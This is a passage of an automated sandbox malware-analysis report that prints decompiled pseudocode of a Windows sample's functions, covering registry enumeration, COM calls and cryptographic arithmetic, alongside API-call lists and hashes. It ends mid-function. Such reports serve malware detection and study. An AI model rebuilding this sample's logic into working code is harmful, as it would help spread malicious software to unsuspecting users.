            				void* _t2;
            				unsigned int _t4;
            				void* _t5;
            				long _t6;
            				void* _t7;
            				void* _t15;
            
            				_t2 = CreateEventA(0, 1, 0, 0);
            				 *0x7ea30c = _t2;
            				if(_t2 == 0) {
            					return GetLastError();
            				}
            				_t4 = GetVersion();
            				if(_t4 != 5) {
            					L4:
            					if(_t15 <= 0) {
            						_t5 = 0x32;
            						return _t5;
            					}
            					L5:
            					 *0x7ea2fc = _t4;
            					_t6 = GetCurrentProcessId();
            					 *0x7ea2f8 = _t6;
            					 *0x7ea304 = _a4;
            					_t7 = OpenProcess(0x10047a, 0, _t6);
            					 *0x7ea2f4 = _t7;
            					if(_t7 == 0) {
            						 *0x7ea2f4 =  *0x7ea2f4 | 0xffffffff;
            					}
            					return 0;
            				}
            				if(_t4 >> 8 > 0) {
            					goto L5;
            				}
            				_t15 = _t4 - _t4;
            				goto L4;
            			}

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,007E5037,?), ref: 007E54E0
            • GetVersion.KERNEL32 ref: 007E54EF
            • GetCurrentProcessId.KERNEL32 ref: 007E550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 007E5528
            • GetLastError.KERNEL32 ref: 007E5547
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID:
            • API String ID: 2270775618-0
            • Opcode ID: 40dc1932563ac8d47a57b2b3b237178149e3f0dbd7512b2caaa15e090d0bc827
            • Instruction ID: 7ed095a981f0d647e4a193dfb8d781eff9494bd5ea440d1212bac2cb543ccdf8
            • Opcode Fuzzy Hash: 40dc1932563ac8d47a57b2b3b237178149e3f0dbd7512b2caaa15e090d0bc827
            • Instruction Fuzzy Hash: F6F0A4B45437C7ABD7208B21AC99B143B67B74C759F608419E713DE1E0E67C94A0CB1E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00782052
            • GetModuleHandleA.KERNEL32(00000000), ref: 00782062
            • GetCommandLineW.KERNEL32 ref: 0078206D
              • Part of subcall function 00781C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00781C8D
              • Part of subcall function 00781C58: Sleep.KERNEL32(00000000,00000030), ref: 00781CD4
              • Part of subcall function 00781C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00781CFC
              • Part of subcall function 00781C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00781D06
              • Part of subcall function 00781C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00781D19
            • HeapDestroy.KERNEL32 ref: 00782080
            • ExitProcess.KERNEL32 ref: 00782087
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
            • String ID:
            • API String ID: 1393419808-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 2c1dc281cd68b136931425359af50efa56f5214acc19ff5f76cbe7a0aa80d4c7
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 56E0B6B0843220ABC3216F71BE0CA4E7E2CBB59B537000535F605F2125CB384A41CBAC
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E007E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
            				signed int _v8;
            				char _v12;
            				signed int* _v16;
            				char _v284;
            				void* __esi;
            				char* _t59;
            				intOrPtr* _t60;
            				intOrPtr _t64;
            				char _t65;
            				intOrPtr _t68;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				void* _t73;
            				signed int _t81;
            				void* _t91;
            				void* _t92;
            				char _t98;
            				signed int* _t100;
            				intOrPtr* _t101;
            				void* _t102;
            
            				_t92 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t98 = _a16;
            				if(_t98 == 0) {
            					__imp__( &_v284,  *0x7ea3dc);
            					_t91 = 0x80000002;
            					L6:
            					_t59 = E007E6536( &_v284,  &_v284);
            					_a8 = _t59;
            					if(_t59 == 0) {
            						_v8 = 8;
            						L29:
            						_t60 = _a20;
            						if(_t60 != 0) {
            							 *_t60 =  *_t60 + 1;
            						}
            						return _v8;
            					}
            					_t101 = _a24;
            					if(E007E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
            						L27:
            						E007E61DA(_a8);
            						goto L29;
            					}
            					_t64 =  *0x7ea318; // 0x2f19e40
            					_t16 = _t64 + 0xc; // 0x2f19f62
            					_t65 = E007E6536(_t64,  *_t16);
            					_a24 = _t65;
            					if(_t65 == 0) {
            						L14:
            						_t29 = _t101 + 0x14; // 0x102
            						_t33 = _t101 + 0x10; // 0x3d007e90
            						if(E007E7767(_t97,  *_t33, _t91, _a8,  *0x7ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
            							_t68 =  *0x7ea348; // 0x272d5a8
            							if(_t98 == 0) {
            								_t35 = _t68 + 0x7ebb5a; // 0x4d4c4b48
            								_t69 = _t35;
            							} else {
            								_t34 = _t68 + 0x7ebbac; // 0x55434b48
            								_t69 = _t34;
            							}
            							if(E007E7238(_t69,  *0x7ea3d4,  *0x7ea3d8,  &_a24,  &_a16) == 0) {
            								if(_t98 == 0) {
            									_t71 =  *0x7ea348; // 0x272d5a8
            									_t44 = _t71 + 0x7eb332; // 0x74666f53
            									_t73 = E007E6536(_t44, _t44);
            									_t99 = _t73;
            									if(_t73 == 0) {
            										_v8 = 8;
            									} else {
            										_t47 = _t101 + 0x10; // 0x3d007e90
            										E007E5B0E( *_t47, _t91, _a8,  *0x7ea3d8, _a24);
            										_t49 = _t101 + 0x10; // 0x3d007e90
            										E007E5B0E( *_t49, _t91, _t99,  *0x7ea3d0, _a16);
            										E007E61DA(_t99);
            									}
            								} else {
            									_t40 = _t101 + 0x10; // 0x3d007e90
            									E007E5B0E( *_t40, _t91, _a8,  *0x7ea3d8, _a24);
            									_t43 = _t101 + 0x10; // 0x3d007e90
            									E007E5B0E( *_t43, _t91, _a8,  *0x7ea3d0, _a16);
            								}
            								if( *_t101 != 0) {
            									E007E61DA(_a24);
            								} else {
            									 *_t101 = _a16;
            								}
            							}
            						}
            						goto L27;
            					}
            					_t21 = _t101 + 0x10; // 0x3d007e90
            					_t81 = E007E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
            					if(_t81 == 0) {
            						_t100 = _v16;
            						if(_v12 == 0x28) {
            							 *_t100 =  *_t100 & _t81;
            							_t26 = _t101 + 0x10; // 0x3d007e90
            							E007E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
            						}
            						E007E61DA(_t100);
            						_t98 = _a16;
            					}
            					E007E61DA(_a24);
            					goto L14;
            				}
            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
            					goto L29;
            				} else {
            					_t97 = _a8;
            					E007E7AB0(_t98, _a8,  &_v284);
            					__imp__(_t102 + _t98 - 0x117,  *0x7ea3dc);
            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
            					_t91 = 0x80000003;
            					goto L6;
            				}
            			}

            APIs
            • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 007E4CC7
            • lstrcpy.KERNEL32(?,?), ref: 007E4CF4
              • Part of subcall function 007E6536: lstrlen.KERNEL32(?,00000000,02F19E40,00000000,007E6F0A,02F1A063,43175AC3,?,?,?,?,43175AC3,00000005,007EA00C,4D283A53,?), ref: 007E653D
              • Part of subcall function 007E6536: mbstowcs.NTDLL ref: 007E6566
              • Part of subcall function 007E6536: memset.NTDLL ref: 007E6578
              • Part of subcall function 007E5B0E: lstrlenW.KERNEL32(?,?,?,007E4E5D,3D007E90,80000002,?,007E57D1,74666F53,4D4C4B48,007E57D1,?,3D007E90,80000002,?,?), ref: 007E5B33
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • lstrcpy.KERNEL32(?,00000000), ref: 007E4D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: vj~
            • API String ID: 3924217599-2274497254
            • Opcode ID: 8d07e6d61c795589faccb5dc24f528b9388a19a1fbdcd91583735fc4487adfc5
            • Instruction ID: 988f6e7e5b469c0a6145c792f31322db9ddb28f97b25e4473f31318ba897dde6
            • Opcode Fuzzy Hash: 8d07e6d61c795589faccb5dc24f528b9388a19a1fbdcd91583735fc4487adfc5
            • Instruction Fuzzy Hash: 6A517C72102289FFDF129F66DC84EAA3BBAFF0C344F008518FA1196161D739E925EB11
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E007E5704(void* __ecx, char _a4) {
            				char _v8;
            				char _v12;
            				long _v16;
            				intOrPtr _v20;
            				long _v24;
            				intOrPtr _v28;
            				char _v32;
            				intOrPtr _t35;
            				intOrPtr _t47;
            				void* _t51;
            				void* _t53;
            
            				_t51 = __ecx;
            				_v8 = 0;
            				_v16 = 0;
            				_v12 = 0;
            				_v24 = 0;
            				_t53 =  *0x7ea0f4(0x80000003, 0, 0, 0x20019,  &_v32);
            				if(_t53 != 0) {
            					L18:
            					return _t53;
            				}
            				_t53 = 8;
            				_t35 = E007E33DC(0x104);
            				_v28 = _t35;
            				if(_t35 == 0) {
            					L17:
            					 *0x7ea0d4(_v32);
            					goto L18;
            				}
            				_v20 = 0x104;
            				do {
            					_v16 = _v20;
            					_t10 =  &_v12; // 0x7e6a76
            					_v12 = 0x104;
            					_t53 =  *0x7ea0f8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
            					if(_t53 != 0xea) {
            						if(_t53 != 0) {
            							L14:
            							if(_t53 == 0x103) {
            								_t53 = 0;
            							}
            							L16:
            							E007E61DA(_v28);
            							goto L17;
            						}
            						_t24 =  &_a4; // 0x7e6a76
            						_t53 = E007E4C94(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
            						if(_t53 != 0) {
            							goto L14;
            						}
            						goto L12;
            					}
            					if(_v12 <= 0x104) {
            						if(_v16 <= _v20) {
            							goto L16;
            						}
            						E007E61DA(_v24);
            						_v20 = _v16;
            						_t47 = E007E33DC(_v16);
            						_v24 = _t47;
            						if(_t47 != 0) {
            							L6:
            							_t53 = 0;
            							goto L12;
            						}
            						_t53 = 8;
            						goto L16;
            					}
            					_v8 = _v8 + 1;
            					goto L6;
            					L12:
            				} while (WaitForSingleObject( *0x7ea30c, 0) == 0x102);
            				goto L16;
            			}

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj~,?,?,?,?,?,007E6A76,?), ref: 007E57DE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AllocateHeapObjectSingleWait
            • String ID: 1~~$vj~$vj~
            • API String ID: 3050739573-403210478
            • Opcode ID: fca48616181cd6848e0e64f5da5da0a8f09ad816cc2fc1d7065394dc5021acfc
            • Instruction ID: 2f7a810a91be04f3459716cd359627500b85679be089768393daefc65a500338
            • Opcode Fuzzy Hash: fca48616181cd6848e0e64f5da5da0a8f09ad816cc2fc1d7065394dc5021acfc
            • Instruction Fuzzy Hash: 4E314B71C0159DEFCF21ABA6CC88DEEFFB9EB58354F204026E515B6110D6784E60DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E007E6CDF(intOrPtr* __eax) {
            				void* _v8;
            				WCHAR* _v12;
            				void* _v16;
            				char _v20;
            				void* _v24;
            				intOrPtr _v28;
            				void* _v32;
            				intOrPtr _v40;
            				short _v48;
            				intOrPtr _v56;
            				short _v64;
            				intOrPtr* _t54;
            				intOrPtr* _t56;
            				intOrPtr _t57;
            				intOrPtr* _t58;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				intOrPtr* _t65;
            				short _t67;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr* _t83;
            				intOrPtr* _t87;
            				intOrPtr _t103;
            				intOrPtr _t109;
            				void* _t118;
            				void* _t122;
            				void* _t123;
            				intOrPtr _t130;
            
            				_t123 = _t122 - 0x3c;
            				_push( &_v8);
            				_push(__eax);
            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
            				if(_t118 >= 0) {
            					_t54 = _v8;
            					_t103 =  *0x7ea348; // 0x272d5a8
            					_t5 = _t103 + 0x7eb038; // 0x3050f485
            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
            					_t56 = _v8;
            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
            					if(_t118 >= 0) {
            						__imp__#2(0x7e9284);
            						_v28 = _t57;
            						if(_t57 == 0) {
            							_t118 = 0x8007000e;
            						} else {
            							_t60 = _v32;
            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
            							_t87 = __imp__#6;
            							_t118 = _t61;
            							if(_t118 >= 0) {
            								_t63 = _v24;
            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
            								if(_t118 >= 0) {
            									_t130 = _v20;
            									if(_t130 != 0) {
            										_t67 = 3;
            										_v64 = _t67;
            										_v48 = _t67;
            										_v56 = 0;
            										_v40 = 0;
            										if(_t130 > 0) {
            											while(1) {
            												_t68 = _v24;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t123 = _t123;
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												asm("movsd");
            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
            												if(_t118 < 0) {
            													goto L16;
            												}
            												_t70 = _v8;
            												_t109 =  *0x7ea348; // 0x272d5a8
            												_t28 = _t109 + 0x7eb0e4; // 0x3050f1ff
            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
            												if(_t118 >= 0) {
            													_t75 = _v16;
            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
            													if(_t118 >= 0 && _v12 != 0) {
            														_t79 =  *0x7ea348; // 0x272d5a8
            														_t33 = _t79 + 0x7eb078; // 0x76006f
            														if(lstrcmpW(_v12, _t33) == 0) {
            															_t83 = _v16;
            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
            														}
            														 *_t87(_v12);
            													}
            													_t77 = _v16;
            													 *((intOrPtr*)( *_t77 + 8))(_t77);
            												}
            												_t72 = _v8;
            												 *((intOrPtr*)( *_t72 + 8))(_t72);
            												_v40 = _v40 + 1;
            												if(_v40 < _v20) {
            													continue;
            												}
            												goto L16;
            											}
            										}
            									}
            								}
            								L16:
            								_t65 = _v24;
            								 *((intOrPtr*)( *_t65 + 8))(_t65);
            							}
            							 *_t87(_v28);
            						}
            						_t58 = _v32;
            						 *((intOrPtr*)( *_t58 + 8))(_t58);
            					}
            				}
            				return _t118;
            			}

            APIs
            • SysAllocString.OLEAUT32(007E9284), ref: 007E6D2F
            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 007E6E10
            • SysFreeString.OLEAUT32(00000000), ref: 007E6E29
            • SysFreeString.OLEAUT32(?), ref: 007E6E58
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloclstrcmp
            • String ID:
            • API String ID: 1885612795-0
            • Opcode ID: 7adfa113cca7362bc6de67962cfb2ccebb46d355036e3cc133ba95867e388ae7
            • Instruction ID: d03cf2e4408247971114e9754b8672ece5a9cdf20d8ee202346a101521fe4dd9
            • Opcode Fuzzy Hash: 7adfa113cca7362bc6de67962cfb2ccebb46d355036e3cc133ba95867e388ae7
            • Instruction Fuzzy Hash: 14515E75D01509EFCB01DFA8C888DAEB7BAFF8C744B148598E915EB260D735AD41CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SysAllocString.OLEAUT32(?), ref: 007E59B8
            • SysFreeString.OLEAUT32(00000000), ref: 007E5A9D
              • Part of subcall function 007E6CDF: SysAllocString.OLEAUT32(007E9284), ref: 007E6D2F
            • SafeArrayDestroy.OLEAUT32(00000000), ref: 007E5AF0
            • SysFreeString.OLEAUT32(00000000), ref: 007E5AFF
              • Part of subcall function 007E77E3: Sleep.KERNEL32(000001F4), ref: 007E782B
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree$ArrayDestroySafeSleep
            • String ID:
            • API String ID: 3193056040-0
            • Opcode ID: ca77d51e1b6219f21f83afb955793387f4abda763e67e3cfac01137e083ec73c
            • Instruction ID: 17ca753701408c898184fb02a0017ea0b3d94868b3da4c9ed47511ed5371a039
            • Opcode Fuzzy Hash: ca77d51e1b6219f21f83afb955793387f4abda763e67e3cfac01137e083ec73c
            • Instruction Fuzzy Hash: 9B516E76501649EFDB01DFA9C888A9EBBB6FF8C704F248529E505DB220DB38ED45CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E007E4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				void _v156;
            				void _v428;
            				void* _t55;
            				unsigned int _t56;
            				signed int _t66;
            				signed int _t74;
            				void* _t76;
            				signed int _t79;
            				void* _t81;
            				void* _t92;
            				void* _t96;
            				signed int* _t99;
            				signed int _t101;
            				signed int _t103;
            				void* _t107;
            
            				_t92 = _a12;
            				_t101 = __eax;
            				_t55 = E007E61EF(_a16, _t92);
            				_t79 = _t55;
            				if(_t79 == 0) {
            					L18:
            					return _t55;
            				}
            				_t56 =  *(_t92 + _t79 * 4 - 4);
            				_t81 = 0;
            				_t96 = 0x20;
            				if(_t56 == 0) {
            					L4:
            					_t97 = _t96 - _t81;
            					_v12 = _t96 - _t81;
            					E007E6725(_t79,  &_v428);
            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E007E7477(_t101,  &_v428, _a8, _t96 - _t81);
            					E007E7477(_t79,  &_v156, _a12, _t97);
            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
            					_t66 = E007E6725(_t101, 0x7ea1d0);
            					_t103 = _t101 - _t79;
            					_a8 = _t103;
            					if(_t103 < 0) {
            						L17:
            						E007E6725(_a16, _a4);
            						E007E7894(_t79,  &_v428, _a4, _t97);
            						memset( &_v428, 0, 0x10c);
            						_t55 = memset( &_v156, 0, 0x84);
            						goto L18;
            					}
            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
            					do {
            						if(_v8 != 0xffffffff) {
            							_push(1);
            							_push(0);
            							_push(0);
            							_push( *_t99);
            							L007E82DA();
            							_t74 = _t66 +  *(_t99 - 4);
            							asm("adc edx, esi");
            							_push(0);
            							_push(_v8 + 1);
            							_push(_t92);
            							_push(_t74);
            							L007E82D4();
            							if(_t92 > 0 || _t74 > 0xffffffff) {
            								_t74 = _t74 | 0xffffffff;
            								_v16 = _v16 & 0x00000000;
            							}
            						} else {
            							_t74 =  *_t99;
            						}
            						_t106 = _t107 + _a8 * 4 - 0x1a8;
            						_a12 = _t74;
            						_t76 = E007E5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
            						while(1) {
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							L13:
            							_t92 =  &_v156;
            							if(E007E6E71(_t79, _t92, _t106) < 0) {
            								break;
            							}
            							L14:
            							_a12 = _a12 + 1;
            							_t76 = E007E10A0(_t79,  &_v156, _t106, _t106);
            							 *_t99 =  *_t99 - _t76;
            							if( *_t99 != 0) {
            								goto L14;
            							}
            							goto L13;
            						}
            						_a8 = _a8 - 1;
            						_t66 = _a12;
            						_t99 = _t99 - 4;
            						 *(0x7ea1d0 + _a8 * 4) = _t66;
            					} while (_a8 >= 0);
            					_t97 = _v12;
            					goto L17;
            				}
            				while(_t81 < _t96) {
            					_t81 = _t81 + 1;
            					_t56 = _t56 >> 1;
            					if(_t56 != 0) {
            						continue;
            					}
            					goto L4;
            				}
            				goto L4;
            			}

            APIs
            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 007E4834
            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 007E484A
            • memset.NTDLL ref: 007E48F3
            • memset.NTDLL ref: 007E4909
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: memset$_allmul_aulldiv
            • String ID:
            • API String ID: 3041852380-0
            • Opcode ID: 51e7b0a88840ee257f09858dd7ddf9087a799fa5a5d4de4fc71ee127105ebdf1
            • Instruction ID: ff307f2406dae70b2c9e258d5a7c7d3a17d84a1d1fedd681442be284eafd8f84
            • Opcode Fuzzy Hash: 51e7b0a88840ee257f09858dd7ddf9087a799fa5a5d4de4fc71ee127105ebdf1
            • Instruction Fuzzy Hash: 6E41F531A02298EFDB109F69CC49BDE7775EF4D310F004569F909A7281EB78AE44CB81
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E007E454F(void* __eax, void* __ecx) {
            				char _v8;
            				void* _v12;
            				intOrPtr _v16;
            				char _v20;
            				void* __esi;
            				intOrPtr _t36;
            				intOrPtr* _t37;
            				intOrPtr* _t39;
            				void* _t53;
            				long _t58;
            				void* _t59;
            
            				_t53 = __ecx;
            				_t59 = __eax;
            				_t58 = 0;
            				ResetEvent( *(__eax + 0x1c));
            				_push( &_v8);
            				_push(4);
            				_push( &_v20);
            				_push( *((intOrPtr*)(_t59 + 0x18)));
            				if( *0x7ea160() != 0) {
            					L5:
            					if(_v8 == 0) {
            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
            						L21:
            						return _t58;
            					}
            					 *0x7ea174(0, 1,  &_v12);
            					if(0 != 0) {
            						_t58 = 8;
            						goto L21;
            					}
            					_t36 = E007E33DC(0x1000);
            					_v16 = _t36;
            					if(_t36 == 0) {
            						_t58 = 8;
            						L18:
            						_t37 = _v12;
            						 *((intOrPtr*)( *_t37 + 8))(_t37);
            						goto L21;
            					}
            					_push(0);
            					_push(_v8);
            					_push( &_v20);
            					while(1) {
            						_t39 = _v12;
            						_t56 =  *_t39;
            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
            						ResetEvent( *(_t59 + 0x1c));
            						_push( &_v8);
            						_push(0x1000);
            						_push(_v16);
            						_push( *((intOrPtr*)(_t59 + 0x18)));
            						if( *0x7ea160() != 0) {
            							goto L13;
            						}
            						_t58 = GetLastError();
            						if(_t58 != 0x3e5) {
            							L15:
            							E007E61DA(_v16);
            							if(_t58 == 0) {
            								_t58 = E007E2B18(_v12, _t59);
            							}
            							goto L18;
            						}
            						_t58 = E007E16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
            						if(_t58 != 0) {
            							goto L15;
            						}
            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
            						if(_t58 != 0) {
            							goto L15;
            						}
            						L13:
            						_t58 = 0;
            						if(_v8 == 0) {
            							goto L15;
            						}
            						_push(0);
            						_push(_v8);
            						_push(_v16);
            					}
            				}
            				_t58 = GetLastError();
            				if(_t58 != 0x3e5) {
            					L4:
            					if(_t58 != 0) {
            						goto L21;
            					}
            					goto L5;
            				}
            				_t58 = E007E16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
            				if(_t58 != 0) {
            					goto L21;
            				}
            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
            				goto L4;
            			}

            APIs
            • ResetEvent.KERNEL32(?), ref: 007E4565
            • GetLastError.KERNEL32 ref: 007E457E
              • Part of subcall function 007E16B2: WaitForMultipleObjects.KERNEL32(00000002,007E7C47,00000000,007E7C47,?,?,?,007E7C47,0000EA60), ref: 007E16CD
            • ResetEvent.KERNEL32(?), ref: 007E45F7
            • GetLastError.KERNEL32 ref: 007E4612
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID:
            • API String ID: 2394032930-0
            • Opcode ID: 9655b630c2de93e97d684d87a8a2ecc506d467597a17ded7a4c979ada5ff220f
            • Instruction ID: 6dac6f1e7c833103baeb9cd41d4d6da3e1f60ee6fa8d7735f0dc936803606bbe
            • Opcode Fuzzy Hash: 9655b630c2de93e97d684d87a8a2ecc506d467597a17ded7a4c979ada5ff220f
            • Instruction Fuzzy Hash: 5731D332A01684FFCB219BA6CC48E6E77B9BF8D350F214568E511D71A0EB34ED459B10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E007E49D0(signed int _a4, signed int* _a8) {
            				void* __ecx;
            				void* __edi;
            				signed int _t6;
            				intOrPtr _t8;
            				intOrPtr _t12;
            				short* _t19;
            				void* _t25;
            				signed int* _t28;
            				CHAR* _t30;
            				long _t31;
            				intOrPtr* _t32;
            
            				_t6 =  *0x7ea310; // 0xd448b889
            				_t32 = _a4;
            				_a4 = _t6 ^ 0x109a6410;
            				_t8 =  *0x7ea348; // 0x272d5a8
